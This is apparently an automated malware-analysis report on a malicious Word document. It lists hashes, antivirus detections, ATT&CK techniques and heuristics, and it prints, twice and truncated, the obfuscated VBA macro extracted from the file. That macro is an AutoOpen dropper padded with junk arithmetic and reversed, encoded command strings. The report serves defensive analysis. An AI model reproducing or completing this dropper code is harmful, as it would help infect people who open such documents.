Office (OLE) malware analysis — malicious · 0c8fa46588c5a57a

MALICIOUS

Office (OLE)

170.0 KB Created: 2018-05-17 11:18:00 Authoring application: Microsoft Office Word First seen: 2018-11-13

MD5: 83bae9d929a9afefc5ab13b096fe5a8b SHA-1: 14e84085285f878e307000ddc4a8adefec02efe9 SHA-256: 0c8fa46588c5a57a05d4f24c73ff419fd56c1d136ffa2e78c38bebc9addd4bdc

202 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Dropper.Agent-6547033-0. Static analysis revealed the presence of a VBA macro with an AutoOpen subroutine, which is designed to execute automatically when the document is opened. This macro contains a critical heuristic firing for a Shell() call, indicating it likely attempts to download and execute a secondary payload. The presence of legacy WordBasic auto-execution markers further supports this malicious intent.

Heuristics 6

ClamAV: Doc.Dropper.Agent-6547082-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6547082-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 160140 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	160140 bytes
SHA-256: `fd6ea60fc9cb621aa12183d8fc621c6e2e717326012b2100261aaecfc39876bc`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "pYMjBLNMFjVbC" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub sfzsG(cjkmW) cSnqSu = OwEPm zCzUc = (idFaUM / owVDMJ / 7936 / Fix(dOjPH)) + 63362 - CLng(iGoQK + CLng(53935)) + NcLIL + 85257 * XsSdl - CStr(11758) / tvrGi / CLng(WoQFU) End Sub Sub buwmEB(hjssE) LtFVQm = anpLw cQkYM = (oRRRY / ObhYf / 911 / Fix(nJWRQ)) + 35635 - CLng(SwTnEn + CLng(80342)) + ZnzKjl + 30708 * uchPCK - CStr(78170) / IpIJA / CLng(zTGMn) wiMlQS = ubUUR dcojC = (IJRiPi / uSndET / 96366 / Fix(hQPvz)) + 67964 - CLng(uanUq + CLng(73144)) + iKjDP + 59816 * hzzGjX - CStr(68261) / zQBTz / CLng(LZoCOA) qruou = oduBE tzQRo = (LYocX / XoaSl / 89792 / Fix(AiRqH)) + 6249 - CLng(pzudD + CLng(28716)) + AEzvHA + 74799 * baOUa - CStr(32486) / zWszA / CLng(obIIO) End Sub Sub aLdLZ(WWkdX) uNzCrc = cBjCYl OuMco = (tiMrzO / LEuVTz / 28217 / Fix(mFljf)) + 40556 - CLng(TrJFaV + CLng(88266)) + KHokkP + 3050 * FcnbX - CStr(14966) / iYWzb / CLng(asIRHL) isoTR = jOfOip wjHstO = (dajEX / njOfT / 55507 / Fix(jYMnU)) + 18932 - CLng(YzDKrI + CLng(81963)) + ulQXtz + 83917 * Lkvzo - CStr(441) / zuBlEa / CLng(TXjSn) End Sub Sub Autoopen() On Error Resume Next XWMPbz = cPvjEo BDZKH = (zEPqW / PbStoa / 22758 / Fix(kpYfY)) + 83323 - CLng(XkzRj + CLng(29874)) + SQwZL + 30580 * TGWsph - CStr(26759) / VHJtb / CLng(LftlPM) UVJzvTMzF (UQYqWF + XWiFPmiJNYdcjM + BvPPv) RiCmiJ = MOsIno GlEnvD = (wqwCS / FIartz / 83130 / Fix(cdGCG)) + 29035 - CLng(FYPCi + CLng(55121)) + QqbTs + 65876 * sDkQh - CStr(84642) / nAPqz / CLng(dIwkp) End Sub Sub ltRjzk(DskQZE) wkZVm = XMRXz kOYIr = (iEwZaU / fioLDk / 79894 / Fix(oRticw)) + 32876 - CLng(Ybujm + CLng(99726)) + fjtZvA + 23479 * JEkHp - CStr(66606) / OnKaw / CLng(iZOsNm) zjlwf = IbKKtl tkirqb = (XMGZMD / AJihiN / 77505 / Fix(cTmcrZ)) + 48787 - CLng(dQpUD + CLng(89365)) + XClEAk + 50615 * lcKHS - CStr(61550) / LYnTHL / CLng(OjIwI) JWijGN = iwInp HBzhR = (YAERj / nkSnCv / 4133 / Fix(zCPtbB)) + 8717 - CLng(wPPzi + CLng(9033)) + DOCrr + 69774 * EFBwTd - CStr(77406) / tNlNFE / CLng(GFQCzC) End Sub Sub CjGijP(AEKrV) Jrcibk = VBNRz RIwaol = (PCUskw / RtJaV / 69109 / Fix(bOcib)) + 27567 - CLng(TATpij + CLng(94548)) + DdVGu + 67627 * WkziL - CStr(78904) / snvPtq / CLng(TsNWfv) End Sub Attribute VB_Name = "BCBQcAp" Sub EOpWUs(kzCGrI) tTmHXk = IkPnFU vNjomM = (haXVBb / QUZDt / 42179 / Fix(idUcE)) + 89389 - CLng(iZiPXL + CLng(79208)) + TREvzL + 85670 * lWJds - CStr(30844) / kLwYMk / CLng(LhSlD) End Sub Function XWiFPmiJNYdcjM() On Error Resume Next oGdPS = AHwzYz NjFvRE = (jwDYn / wEGWdM / 16637 / Fix(bfttKL)) + 29183 - CLng(lOaaWX + CLng(60309)) + mBhpR + 80088 * Fcqiw - CStr(1469) / ULowlD / CLng(BGtzz) KqDow = FppOCF GzUzU = (mIuDmz / jIuipH / 93629 / Fix(qQFZi)) + 73645 - CLng(dafpI + CLng(31522)) + hfsmw + 31598 * QnRpK - CStr(33531) / uGYvJi / CLng(iOapM) EOVVIY = kJipQ("0.Rts[,'8OA'(Ecalper.)'$','rNG'(Ecalper.)'`','Fah'(Ecalper.)'))93]raHC[]gnIrTS[,)811bv,l99Z", 86832 + 8 - 86832, 86832 + 82 - 86832) iTYwqV = aPqCK KadokU = (OjUGu / hIzQRz / 68207 / Fix(cwOVzp)) + 18659 - CLng(fPVkc + CLng(46095)) + EaqVsM + 89780 * RBqnzb - CStr(96570) / Fbqhd / CLng(TkiLr) PZumZX = iXHdPj SiLri = (YaYat / HHfAY / 74725 / Fix(WjwSi)) + 51600 - CLng(cdhct + CLng(41053)) + hZTFjH + 28093 * oATtA - CStr(30144) / wXiqMJ / CLng(UPcQUh) UEciOJrW = kJipQ("r7F]raHC[+27]raHC[+38]raHC[((ECALper.)43]raHC[]gnIrTS[,)76]raHC[+1'+'11]'+'raHC[+78]raHC[((ECALper.)8OAFah8OA,)301]raHC[+901]raHC[+021]raHC[((EC'+'ALper.)29]raHC[]gnIrTS[,8OAzEAVNF", 8616 + 6 - 8616, 8616 + 172 - 8616) twhXva = MvpfoQ zzpawt = (KuDJUn / DcSmh / 19106 / Fix(EmVEpB)) + 74067 - CLng(sKXtBX + CLng(31599)) + qWnRiB + 57964 * bmdIS - CStr(44371) / HGwsMT / CLng(IsriB) cHhap = XWpzH GZMbTK = (LUrmH / YNwWmh / 64666 / Fix(EsFrF)) + 71890 - CLng(QKOjN + CLng(63204)) + ZGljLX + 34448 * kVZoQp - CStr(53075) / CSaMCh / CLng(jNZpu) BULsQmdb = ... (truncated)

SHA-256: fd6ea60fc9cb621aa12183d8fc621c6e2e717326012b2100261aaecfc39876bc

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "pYMjBLNMFjVbC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub sfzsG(cjkmW)
cSnqSu = OwEPm
zCzUc = (idFaUM / owVDMJ / 7936 / Fix(dOjPH)) + 63362 - CLng(iGoQK + CLng(53935)) + NcLIL + 85257 * XsSdl - CStr(11758) / tvrGi / CLng(WoQFU)
End Sub
Sub buwmEB(hjssE)
LtFVQm = anpLw
cQkYM = (oRRRY / ObhYf / 911 / Fix(nJWRQ)) + 35635 - CLng(SwTnEn + CLng(80342)) + ZnzKjl + 30708 * uchPCK - CStr(78170) / IpIJA / CLng(zTGMn)
wiMlQS = ubUUR
dcojC = (IJRiPi / uSndET / 96366 / Fix(hQPvz)) + 67964 - CLng(uanUq + CLng(73144)) + iKjDP + 59816 * hzzGjX - CStr(68261) / zQBTz / CLng(LZoCOA)
qruou = oduBE
tzQRo = (LYocX / XoaSl / 89792 / Fix(AiRqH)) + 6249 - CLng(pzudD + CLng(28716)) + AEzvHA + 74799 * baOUa - CStr(32486) / zWszA / CLng(obIIO)
End Sub
Sub aLdLZ(WWkdX)
uNzCrc = cBjCYl
OuMco = (tiMrzO / LEuVTz / 28217 / Fix(mFljf)) + 40556 - CLng(TrJFaV + CLng(88266)) + KHokkP + 3050 * FcnbX - CStr(14966) / iYWzb / CLng(asIRHL)
isoTR = jOfOip
wjHstO = (dajEX / njOfT / 55507 / Fix(jYMnU)) + 18932 - CLng(YzDKrI + CLng(81963)) + ulQXtz + 83917 * Lkvzo - CStr(441) / zuBlEa / CLng(TXjSn)
End Sub
Sub Autoopen()
On Error Resume Next
XWMPbz = cPvjEo
BDZKH = (zEPqW / PbStoa / 22758 / Fix(kpYfY)) + 83323 - CLng(XkzRj + CLng(29874)) + SQwZL + 30580 * TGWsph - CStr(26759) / VHJtb / CLng(LftlPM)
UVJzvTMzF (UQYqWF + XWiFPmiJNYdcjM + BvPPv)
RiCmiJ = MOsIno
GlEnvD = (wqwCS / FIartz / 83130 / Fix(cdGCG)) + 29035 - CLng(FYPCi + CLng(55121)) + QqbTs + 65876 * sDkQh - CStr(84642) / nAPqz / CLng(dIwkp)
End Sub
Sub ltRjzk(DskQZE)
wkZVm = XMRXz
kOYIr = (iEwZaU / fioLDk / 79894 / Fix(oRticw)) + 32876 - CLng(Ybujm + CLng(99726)) + fjtZvA + 23479 * JEkHp - CStr(66606) / OnKaw / CLng(iZOsNm)
zjlwf = IbKKtl
tkirqb = (XMGZMD / AJihiN / 77505 / Fix(cTmcrZ)) + 48787 - CLng(dQpUD + CLng(89365)) + XClEAk + 50615 * lcKHS - CStr(61550) / LYnTHL / CLng(OjIwI)
JWijGN = iwInp
HBzhR = (YAERj / nkSnCv / 4133 / Fix(zCPtbB)) + 8717 - CLng(wPPzi + CLng(9033)) + DOCrr + 69774 * EFBwTd - CStr(77406) / tNlNFE / CLng(GFQCzC)
End Sub
Sub CjGijP(AEKrV)
Jrcibk = VBNRz
RIwaol = (PCUskw / RtJaV / 69109 / Fix(bOcib)) + 27567 - CLng(TATpij + CLng(94548)) + DdVGu + 67627 * WkziL - CStr(78904) / snvPtq / CLng(TsNWfv)
End Sub

Attribute VB_Name = "BCBQcAp"
Sub EOpWUs(kzCGrI)
tTmHXk = IkPnFU
vNjomM = (haXVBb / QUZDt / 42179 / Fix(idUcE)) + 89389 - CLng(iZiPXL + CLng(79208)) + TREvzL + 85670 * lWJds - CStr(30844) / kLwYMk / CLng(LhSlD)
End Sub
Function XWiFPmiJNYdcjM()
On Error Resume Next
oGdPS = AHwzYz
NjFvRE = (jwDYn / wEGWdM / 16637 / Fix(bfttKL)) + 29183 - CLng(lOaaWX + CLng(60309)) + mBhpR + 80088 * Fcqiw - CStr(1469) / ULowlD / CLng(BGtzz)
KqDow = FppOCF
GzUzU = (mIuDmz / jIuipH / 93629 / Fix(qQFZi)) + 73645 - CLng(dafpI + CLng(31522)) + hfsmw + 31598 * QnRpK - CStr(33531) / uGYvJi / CLng(iOapM)
EOVVIY = kJipQ("0.Rts[,'8OA'(Ecalper.)'$','rNG'(Ecalper.)'`','Fah'(Ecalper.)'))93]raHC[]gnIrTS[,)811bv,l99Z", 86832 + 8 - 86832, 86832 + 82 - 86832)
iTYwqV = aPqCK
KadokU = (OjUGu / hIzQRz / 68207 / Fix(cwOVzp)) + 18659 - CLng(fPVkc + CLng(46095)) + EaqVsM + 89780 * RBqnzb - CStr(96570) / Fbqhd / CLng(TkiLr)
PZumZX = iXHdPj
SiLri = (YaYat / HHfAY / 74725 / Fix(WjwSi)) + 51600 - CLng(cdhct + CLng(41053)) + hZTFjH + 28093 * oATtA - CStr(30144) / wXiqMJ / CLng(UPcQUh)
UEciOJrW = kJipQ("r7F]raHC[+27]raHC[+38]raHC[((ECALper.)43]raHC[]gnIrTS[,)76]raHC[+1'+'11]'+'raHC[+78]raHC[((ECALper.)8OAFah8OA,)301]raHC[+901]raHC[+021]raHC[((EC'+'ALper.)29]raHC[]gnIrTS[,8OAzEAVNF", 8616 + 6 - 8616, 8616 + 172 - 8616)
twhXva = MvpfoQ
zzpawt = (KuDJUn / DcSmh / 19106 / Fix(EmVEpB)) + 74067 - CLng(sKXtBX + CLng(31599)) + qWnRiB + 57964 * bmdIS - CStr(44371) / HGwsMT / CLng(IsriB)
cHhap = XWpzH
GZMbTK = (LUrmH / YNwWmh / 64666 / Fix(EsFrF)) + 71890 - CLng(QKOjN + CLng(63204)) + ZGljLX + 34448 * kVZoQp - CStr(53075) / CSaMCh / CLng(jNZpu)
BULsQmdb =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.